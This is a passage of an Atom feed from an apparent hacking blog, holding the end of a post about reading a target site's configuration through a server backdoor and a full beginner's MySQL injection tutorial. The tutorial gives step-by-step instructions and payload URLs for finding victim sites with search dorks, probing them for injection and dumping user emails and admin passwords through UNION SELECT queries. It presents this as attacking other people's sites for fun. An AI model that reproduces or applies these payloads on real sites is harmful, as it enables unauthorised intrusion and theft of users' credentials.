/&gt;&lt;div style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Penetrate Target Site&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;By cicking on&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: limegreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;var&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;/ at&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: limegreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;www.backdoorsite.com&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;we go straight to&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: limegreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;root&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;of the server&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://dippic.com/2x5pk22e8u24" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;&lt;img alt="[Image: 2x5pk22e8u24.png]" border="0" height="519" src="http://d1.dipads.net/i/00025/2x5pk22e8u24.png" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="640" /&gt;&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Where we can find our&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: limegreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;www.target.com dir&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Sometimes premisions isn't&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;&amp;nbsp;drwx&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;but&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;dr-x&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;which is more then enough to read&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: limegreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;configuration&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;file.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://dippic.com/rni1js1ocemg" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" target="_blank"&gt;&lt;img alt="[Image: rni1js1ocemg.png]" border="0" height="523" src="http://d1.dipads.net/i/00025/rni1js1ocemg.png" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="640" /&gt;&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: red; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;With data from that file we can hack unhackable site...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-8162364883870101592?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/8162364883870101592/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/how-to-hack-unhackable-site.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/8162364883870101592'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/8162364883870101592'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/how-to-hack-unhackable-site.html' title='HOW TO HACK UNHACKABLE SITE'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-3068613057521440485</id><published>2012-02-01T22:03:00.002+06:00</published><updated>2012-02-01T22:03:35.866+06:00</updated><title type='text'>--&lt; Ultimate MySQL Injection Tutorial For Beginners &gt;--</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="smalltext" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 11px;"&gt;&lt;strong&gt;--&amp;lt; Ultimate MySQL Injection Tutorial For Beginners &amp;gt;--&lt;/strong&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="post_body" id="pid_341827" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"&gt;Contents&lt;br /&gt;1A: Understanding SQL Injection&lt;br /&gt;1B: Tricks &amp;amp; Tools&lt;br /&gt;1C: Requirements&lt;br /&gt;------&lt;br /&gt;2A: Searching for Targets&lt;br /&gt;2B: Testing Targets for Vulnerabilities&lt;br /&gt;2C: Finding Columns&lt;br /&gt;2D: Finding Vulnerable Columns&lt;br /&gt;------&lt;br /&gt;3A: Obtaining the SQL version&lt;br /&gt;3B: Version 4&lt;br /&gt;- 1. Obtaining Tables &amp;amp; Columns&lt;br /&gt;- 2. Commands&lt;br /&gt;3C: Version 5&lt;br /&gt;- 1. Obtaining Table Names&lt;br /&gt;- 2. Obtaining Column Names from Tables ------------------------------------------------------------------------&lt;br /&gt;1A: Understanding SQL Injection&lt;br /&gt;SQL Injection is one of todays most powerful methods of system penetration, using error&lt;br /&gt;&lt;br /&gt;based queries one is able to extract data (tables &amp;amp; columns) from a vulnerable system,&lt;br /&gt;&lt;br /&gt;namely the (database).&lt;br /&gt;&lt;br /&gt;1B: Tricks &amp;amp; Tips&lt;br /&gt;Beginners tend to believe that using tools created by advanced SQL injection artists are the&lt;br /&gt;&lt;br /&gt;best way around things, please believe that they aren't, everything seems nice and easy with&lt;br /&gt;&lt;br /&gt;tools such as (BSQLi and SQLi Helper) which they are, but the users posting the download&lt;br /&gt;&lt;br /&gt;links for both applications around the world on hacking forums have been known to very&lt;br /&gt;&lt;br /&gt;securely encrypt these tools with malicious files or backdoors etc, I've experienced this&lt;br /&gt;&lt;br /&gt;first hand when I first started out. Learning everything manually will help you understand&lt;br /&gt;&lt;br /&gt;the environment you are attempting to penetrate, whilst experimenting with commands you have&lt;br /&gt;&lt;br /&gt;learnt will only help you become more advanced in SQL injection, as for tricks, there are&lt;br /&gt;&lt;br /&gt;many articles named (Cheat Sheets) because this is what they are, purposely created for SQL&lt;br /&gt;&lt;br /&gt;injectors to use commands which aren't normally spoken of or known about, Samples are&lt;br /&gt;&lt;br /&gt;provided to allow the reader to get basic idea of a potential attack.&lt;br /&gt;&lt;br /&gt;1C: Requirements:&lt;br /&gt;When I first started SQL injection personally for me it wasn't to hard to get on the ball&lt;br /&gt;&lt;br /&gt;and learn quickly, this is because I had previous knowledge of web-scripts, how the internet&lt;br /&gt;&lt;br /&gt;works, and the ability to read and understand complicated tutorials. I believe it's a whole&lt;br /&gt;&lt;br /&gt;lot easier if you know the basics of a computer system and how the internet works.&lt;br /&gt;To learn you must be able to read and understand the tutorial or article provided and take&lt;br /&gt;&lt;br /&gt;on board everything you see. When I was a beginner I found it easier to attack whilst&lt;br /&gt;&lt;br /&gt;reading, do everything in stages, don't read the whole tutorial and go off and expect to&lt;br /&gt;&lt;br /&gt;inject off the top of your head. ------------------------------------------------------------------------&lt;br /&gt;2A Searching for Targets&lt;br /&gt;Ahh, the beauty of searching for targets is a lot easier than it sounds, the most common&lt;br /&gt;&lt;br /&gt;method of searching is (Dorks). Dorks are an input query into a search engine (Google) which&lt;br /&gt;&lt;br /&gt;attempt to find websites with the given texxt provided in the dork itself. So navigate to&lt;br /&gt;&lt;br /&gt;Google and copy the following into the search box:&lt;br /&gt;inurl:"products.php?prodID="&lt;br /&gt;This search will return websites affiliated with Google with "products.php?prodID=" within&lt;br /&gt;&lt;br /&gt;the URL.&lt;br /&gt;You can find a wide range of dorks to use by searching the forum.&lt;br /&gt;I advise you to create your own dorks, be original, but at the same time unique, think of&lt;br /&gt;&lt;br /&gt;something to use that not many people would have already searched and tested.&lt;br /&gt;An example of a dork I would make up:&lt;br /&gt;inurl:"/shop/index.php?item_id=" &amp;amp; ".co.uk"&lt;br /&gt;So using your own dorks isn't a bad thing at all, sometimes your dorks wont work, nevermind&lt;br /&gt;&lt;br /&gt;even I get it..&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;2B: Testing Targets for Vulnerabilities&lt;br /&gt;It's important that this part's done well. I'll explain this as simply as I can.&lt;br /&gt;After opening a URL found in one of your dork results on Google you now need to test the&lt;br /&gt;&lt;br /&gt;site if it's vulnerable to SQL injection.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;a href="http://www.site.com/index.php?Client_id=23" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.site.com/index.php?Client_id=23&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;To test, just simply add an asterik ' at the end of the URL&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;a href="http://www.site.com/index.php?Client_id=23'" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.site.com/index.php?Client_id=23'&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;How to tell if the sites vulnerable:&lt;br /&gt;- Missing text, images, spaces or scripts from the original page.&lt;br /&gt;- Any kind of typical SQL error (fetch_array) etc.&lt;br /&gt;&lt;br /&gt;So if the website you're testing produces any of the above then the site is unfortunately&lt;br /&gt;&lt;br /&gt;vulnerable, which is where the fun starts.&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;2C: Finding Columns &amp;amp; the Vulnerable Columns&lt;br /&gt;As I noted in the first section of the tutorial I advise you do pretty much everything&lt;br /&gt;&lt;br /&gt;manually with SQL injection, so by using the following commands (providing they're followed&lt;br /&gt;&lt;br /&gt;correctly) you will begin to see results in no time&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;a href="http://www.site.com/index.php?Client_id=23'" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.site.com/index.php?Client_id=23'&lt;/a&gt;&lt;br /&gt;^^^^^^^^^^^^^^^^^^^^^^^^&lt;br /&gt;IF THE SITE IS VULNERABLE&lt;br /&gt;Refer to the following to checking how many columns there are.&lt;br /&gt;(order+by) the order by function tells the database to order columns by an integer (digit&lt;br /&gt;&lt;br /&gt;e.g. 1 or 2), no errors returned means the column is there, if there's an error returned the&lt;br /&gt;&lt;br /&gt;column isnt there&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+order+by+1 &amp;lt; No Error&lt;br /&gt;wxw.site.com/index.php?Client_id=23+order+by+2 &amp;lt; No Error&lt;br /&gt;wxw.site.com/index.php?Client_id=23+order+by+3 &amp;lt; No Error&lt;br /&gt;wxw.site.com/index.php?Client_id=23+order+by+4 &amp;lt; ERROR&lt;br /&gt;&lt;br /&gt;From using order+by+ command and incremating the number each time until the page&lt;br /&gt;&lt;br /&gt;displays an error is the easiest method to find vulnerable columns, so from the examples&lt;br /&gt;&lt;br /&gt;above when attempting to order the columns by 4 there's an error, and so column 4 doesn't&lt;br /&gt;&lt;br /&gt;exist, so there's 3 columns.&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;2D: Finding Vulnerable Columns&lt;br /&gt;Ok so let's say we were working on the site I used above, which has 3 columns. We now need&lt;br /&gt;&lt;br /&gt;to find out which of those three coluns are vulnerable. Vulnerable columns allow us to&lt;br /&gt;&lt;br /&gt;submit commands and queries to the SQL database through the URL. (union+select)&lt;br /&gt;&lt;br /&gt;Selects all columns provided in the URL and returns the value of the vulnerable column e.g.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,2,3&lt;br /&gt;&lt;br /&gt;The site should refresh, not with an error but with some content missing and a number is&lt;br /&gt;&lt;br /&gt;displayed on the page, either 1, 2 or 3 (as we selected the three columns in the above URL&lt;br /&gt;&lt;br /&gt;to test for column vulnerability).&lt;br /&gt;Sometimes the page will return and look completely normal, which isn't a problem. Some sites&lt;br /&gt;&lt;br /&gt;you are required to null the value you're injecting into.&lt;br /&gt;&lt;br /&gt;In simpler terms, the =23 you see in the above URL after Client_id must be nulled in order&lt;br /&gt;&lt;br /&gt;to return with the vulnerable column. So we simply put a hyphen (minus sign) before the 23&lt;br /&gt;&lt;br /&gt;like so: -23&lt;br /&gt;So the URL should now look something like this:&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,2,3&lt;br /&gt;&lt;br /&gt;Now that should work, let's say the page refreshes and displays a 2 on the page, thus 2&lt;br /&gt;&lt;br /&gt;being the vulnerable column for us to inject into. ------------------------------------------------------------------------&lt;br /&gt;3A: Obtaining the SQL Verison&lt;br /&gt;Easier said than done, using the information found in the above sections e.g. amount of&lt;br /&gt;&lt;br /&gt;columns and the vulnerable column. We now use a command (@@version) and in some cases&lt;br /&gt;&lt;br /&gt;a series of commands to determine what the SQL version is on the current site. Version 4 or&lt;br /&gt;&lt;br /&gt;version 5. See the example below to view what a URL should look like when the version&lt;br /&gt;&lt;br /&gt;command has been inserted into the URL replacing the number 2 as 2 is the vulnerable column&lt;br /&gt;&lt;br /&gt;on the example site.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3&lt;br /&gt;&lt;br /&gt;What you need to look for is a series of numbers e.g:&lt;br /&gt;5.0.89-community&lt;br /&gt;4.0.45-log&lt;br /&gt;&lt;br /&gt;If the above failes and the site just returns an error or displays normally then we need to&lt;br /&gt;&lt;br /&gt;use the convert function in order for the server to understand the command, don't worry&lt;br /&gt;&lt;br /&gt;though this is usually the only thing you need to convert and it's on a rare occasion where&lt;br /&gt;&lt;br /&gt;this is the case.&lt;br /&gt;&lt;br /&gt;So, if the example site returned an error we need to replace @@version with the convert()&lt;br /&gt;&lt;br /&gt;function:&lt;br /&gt;convert(@@version using latin1)&lt;br /&gt;&lt;br /&gt;So the example site will now look like this:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@version using latin1),3&lt;br /&gt;&lt;br /&gt;Now if the page still decides to not return the error then the query must be hexxed:&lt;br /&gt;unhex(hex(@@version))&lt;br /&gt;&lt;br /&gt;So the example site will now look like this:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,unhex(hex(@@version)),3&lt;br /&gt;&lt;br /&gt;Depending on which version the SQL server it is, whether it be 4, or 5 the queries for&lt;br /&gt;&lt;br /&gt;obtaining data from both versions are different, version 4 and 5 tables are explained below&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;3B Version 4&lt;br /&gt;- 1. Obtaining Tables and Columns&lt;br /&gt;&lt;br /&gt;You will notice that obtaining tables and columns from version 4 MySQL servers is a little&lt;br /&gt;&lt;br /&gt;more time consuming and confusing at times as we have to guess pretty much everyhing.&lt;br /&gt;&lt;br /&gt;Because version 5 is more up to date and has information_schema which the database and&lt;br /&gt;&lt;br /&gt;tables are stored in, MySQL version 4 doesn't.&lt;br /&gt;Providing the MySQL version of the website is 4, we must do the following.&lt;br /&gt;&lt;br /&gt;So, back to the example URL:&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3&lt;br /&gt;&lt;br /&gt;We must now go back to the original URL which is:&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,2,3&lt;br /&gt;&lt;br /&gt;This is where the guessing begins, we need to guess table names.&lt;br /&gt;How can we tell if the table name I guess exists?&lt;br /&gt;The same as where we tested for the amount of columns.&lt;br /&gt;If no error is produced then the table guessed exists.&lt;br /&gt;Is there is an error then the table guessed doesn't exist, so just try another.&lt;br /&gt;So we use the (from) command followed by the table name you are looking to see&lt;br /&gt;&lt;br /&gt;exists.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin&lt;br /&gt;&lt;br /&gt;Usual tables most people search for consist of obtaining user data, so again, be creative&lt;br /&gt;&lt;br /&gt;just like with the dorks, common table names I use:&lt;br /&gt;&lt;br /&gt;tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer,&lt;br /&gt;&lt;br /&gt;customers, orders, phpbb_users, phpbb_admins&lt;br /&gt;&lt;br /&gt;So if we tried the following as an example:&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin&lt;br /&gt;^^^&lt;br /&gt;Error&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from user&lt;br /&gt;^^^&lt;br /&gt;Error&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from users&lt;br /&gt;^^^^^&lt;br /&gt;No Error&lt;br /&gt;&lt;br /&gt;Now which table do you think exists..?&lt;br /&gt;&amp;nbsp;The table users exists&lt;br /&gt;&lt;br /&gt;We are now required to guess column names from the existing table. So thinking logically,&lt;br /&gt;&lt;br /&gt;which labelled columns within this table would represent data? Columns such as:&lt;br /&gt;first_name, last_name, email, username, password, pass, user_id&lt;br /&gt;^^^^^^^^^^^^^^^^^^^^^^^^^&lt;br /&gt;Typical columns found in the users table.&lt;br /&gt;&lt;br /&gt;So we now must think back to which column is vulnerable (in this case 2) and so we'll use&lt;br /&gt;&lt;br /&gt;the URL and replace 2 with the column name you are attempting to see if exists in the users&lt;br /&gt;&lt;br /&gt;table. Let's try a few of the typicals listed above:&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3 from users&lt;br /&gt;^^^^&lt;br /&gt;Error&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3 from users&lt;br /&gt;^^^&lt;br /&gt;Error&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,address1,3 from users&lt;br /&gt;^^^&lt;br /&gt;Error&lt;br /&gt;&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,email,3 from users&lt;br /&gt;^^^^^&lt;br /&gt;No Error&lt;br /&gt;&lt;br /&gt;From the above we can clearly see that the column email exists within the table users, the&lt;br /&gt;&lt;br /&gt;page should return displaying data (most probably an email address) or the data you are&lt;br /&gt;&lt;br /&gt;extracting i.e if you pulled password from users and the column exists the first password&lt;br /&gt;&lt;br /&gt;within that column will be displayed on screen.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Commands&lt;br /&gt;From here we will be able to use certain commands to determine the amount of data we pull&lt;br /&gt;&lt;br /&gt;from the database or which exact record you wish to pull from a column.&lt;br /&gt;&lt;br /&gt;concat()&lt;br /&gt;&lt;br /&gt;We will now use the concat() function to extract data from multiple columns if only one&lt;br /&gt;&lt;br /&gt;column is vulnerable, in this case remembering back the vulnerable column is 2, so we can&lt;br /&gt;&lt;br /&gt;only query in within this space.&lt;br /&gt;&lt;br /&gt;Command: concat(columnname1,0x3a,columnname2)&lt;br /&gt;0x3a is the hex value of a semi-colon : so the output data from the query will be displayed&lt;br /&gt;&lt;br /&gt;like:this&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,concat(email,0x3a,password),3 from users&lt;br /&gt;&lt;br /&gt;The above will output the first email and password found in the table.&lt;br /&gt;&lt;br /&gt;group_concat():&lt;br /&gt;&lt;br /&gt;We will now use the group_concat() function to group all data from one column and display&lt;br /&gt;&lt;br /&gt;them on one page. Same as the above concat() command just grouping all records together and&lt;br /&gt;&lt;br /&gt;displaying them as one.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,group_concat(email,0x3a,pass),3 from&lt;br /&gt;&lt;br /&gt;users&lt;br /&gt;&lt;br /&gt;Now the above should return ALL e-mails and passwords listed in the email and passwords&lt;br /&gt;&lt;br /&gt;column within the users table.&lt;br /&gt;&lt;br /&gt;limit 0,1&lt;br /&gt;The limit command is somewhat useful if you're looking for a specific data record. Say for&lt;br /&gt;&lt;br /&gt;instance we wanted to obtain the 250th record for emails in the table users. We would use:&lt;br /&gt;&lt;br /&gt;limit 250,1&lt;br /&gt;Thus displaying the 250th e-mail within the data.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=23+union+select+1,email,3+from+users+limit+250,1 ------------------------------------------------------------------------&lt;br /&gt;Version 5&lt;br /&gt;- 1. Obtaining Table Names&lt;br /&gt;&lt;br /&gt;Now after that painstaking version 4 malakey lol, we're onto version 5, the easiest and&lt;br /&gt;&lt;br /&gt;quickest version of MySQL to hack, so many things are already done for you, so realise the&lt;br /&gt;&lt;br /&gt;possibilities and be imaginative.&lt;br /&gt;&lt;br /&gt;Obtaining table names for version 5 MySQL servers is simple, using information_schema.tables&lt;br /&gt;&lt;br /&gt;&amp;lt; For table extraction&lt;br /&gt;&lt;br /&gt;So, example of the URL from earlier, but imagine it is now version 5&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,table_name,3+from+information_schema.tab&lt;br /&gt;&lt;br /&gt;les&lt;br /&gt;&lt;br /&gt;The above URL will display only the first table name which is listed in the database&lt;br /&gt;&lt;br /&gt;information_schema. So using group_concat()&lt;br /&gt;just like in version 4 works with the same principle.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3 from&lt;br /&gt;&lt;br /&gt;information_schema.tables&lt;br /&gt;&lt;br /&gt;We should now be able to see all the tables listed on one page, sometimes the last tables&lt;br /&gt;&lt;br /&gt;will be cut off the end because a portion of the page will be covered in table names from&lt;br /&gt;&lt;br /&gt;information_schema which aren't useful for us so really, I usually prefer to display table&lt;br /&gt;&lt;br /&gt;names from the primary database rather than information_schema, we can do the following by&lt;br /&gt;&lt;br /&gt;using the +where+table_schema=database() command:&lt;br /&gt;where =&amp;gt; A query for selection&lt;br /&gt;table_schema =&amp;gt; Schema of tables from a database&lt;br /&gt;database() =&amp;gt; In context the primary database, just leave it as it is.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3+from+informat&lt;br /&gt;&lt;br /&gt;ion_schema.tables+where+table_schema=database()&lt;br /&gt;&lt;br /&gt;Example List of tables:&lt;br /&gt;About, Admin, Affiliates, Access, Customer, Users&lt;br /&gt;&lt;br /&gt;Now all tables should be displayed from the primary database, take your pick and get ready&lt;br /&gt;&lt;br /&gt;to extract columns.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Obtaining Column Names from Table Names&lt;br /&gt;&lt;br /&gt;Ok, suggesting from the above we decided to obtain column information from the table Admin.&lt;br /&gt;Using information_schema once again but this time we will be using:&lt;br /&gt;informaiton_schema.columns&lt;br /&gt;instead of&lt;br /&gt;informtion_schema.tables (as we want to extract columns now, not tables)&lt;br /&gt;&lt;br /&gt;The thing with obtaining column information is similar to the principle of obtaining columns in version 4, except we dont have to guess, once again just one command lists them all when combines with group_concat()&lt;br /&gt;&lt;br /&gt;Command:&lt;br /&gt;Edit the vulnerable column (in this case 2) to:&lt;br /&gt;column_name instead of table_name&lt;br /&gt;&lt;br /&gt;And the end of the URL to:&lt;br /&gt;+from+information_schema.columns where table_name=TableNameHEX&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=Admin&lt;br /&gt;&lt;br /&gt;Now the above will return an error because of the way the command is used at the end of the URL (where table_name=Admin)&lt;br /&gt;We must HEX the table name, in this case Admin&lt;br /&gt;I use&amp;nbsp;&lt;a href="http://www.swingnote.com/tools/texttohex.php" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;THIS&lt;/a&gt;&amp;nbsp;website to for converting Text to Hex.&lt;br /&gt;&lt;br /&gt;The HEX of Admin is: 41646d696e&lt;br /&gt;Now we must add 0x (MySQL integer) at the front of the HEX, which should now look like this: 0x41646d696e&lt;br /&gt;And pop it onto the end of the URL replacing Admin, so the URL should look something like the following.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41646d696e&lt;br /&gt;&lt;br /&gt;Now all columns from the table Admin will be displayed on the page, just the same as version 4 we will use the same command to extract data from certain columns within the table.&lt;br /&gt;&lt;br /&gt;Say for instance the following columns were displayed:&lt;br /&gt;username, password, id, admin_user&lt;br /&gt;&lt;br /&gt;We would be able to do the same as version 4, replacing the vulnerable column (2) with a column name (one of the above) i.e. username and password using the concat() function.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;wxw.site.com/index.php?Client_id=-23+union+select+1,concat(username,0x3a,password),3+from+Admin&lt;br /&gt;&lt;br /&gt;Will display the first username and password data entries from the columns username and password in the table Admin.&lt;br /&gt;&lt;br /&gt;You can still use group_concat() &amp;amp; limit 0,1&lt;br /&gt;Exactly the same as version 4&lt;/div&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-3068613057521440485?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/3068613057521440485/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/blog-post.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/3068613057521440485'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/3068613057521440485'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/blog-post.html' title='--&lt; Ultimate MySQL Injection Tutorial For Beginners &gt;--'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' 